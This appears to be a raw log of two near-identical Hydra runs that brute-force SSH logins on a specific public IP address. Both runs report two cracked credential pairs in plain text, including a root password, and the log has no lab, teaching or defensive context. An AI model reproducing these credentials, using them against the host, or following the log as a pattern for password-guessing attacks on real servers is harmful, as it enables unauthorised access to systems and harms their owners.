Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-09-13 00:05:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:12/p:21), ~16 tries per task
[DATA] attacking ssh://20.226.117.210:22/
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[22][ssh] host: 20.226.117.210   login: root   password: r00t
[22][ssh] host: 20.226.117.210   login: alemao   password: schalke04
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-09-13 00:06:26
<finished>

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-09-13 00:07:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:12/p:21), ~16 tries per task
[DATA] attacking ssh://20.226.117.210:22/
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[22][ssh] host: 20.226.117.210   login: root   password: r00t
[22][ssh] host: 20.226.117.210   login: alemao   password: schalke04
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-09-13 00:08:16
<finished>

